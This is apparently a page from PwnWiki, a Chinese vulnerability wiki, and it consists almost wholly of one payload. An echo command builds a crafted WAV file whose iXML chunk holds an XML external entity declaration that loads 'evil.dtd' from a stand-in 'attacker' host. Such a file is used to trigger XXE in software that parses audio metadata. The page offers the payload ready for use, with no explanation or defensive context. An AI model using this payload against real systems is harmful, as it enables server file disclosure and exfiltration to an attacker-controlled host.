免费、自由、人人可编辑的漏洞库--PwnWiki.com
,
Payload
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY<!ENTITY % remote SYSTEM '"'"'http://attacker/evil.dtd'"'"'>%remote;%init;%trick;>\x00' > payload.wav
免费、自由、人人可编辑的漏洞库--pwnwiki.com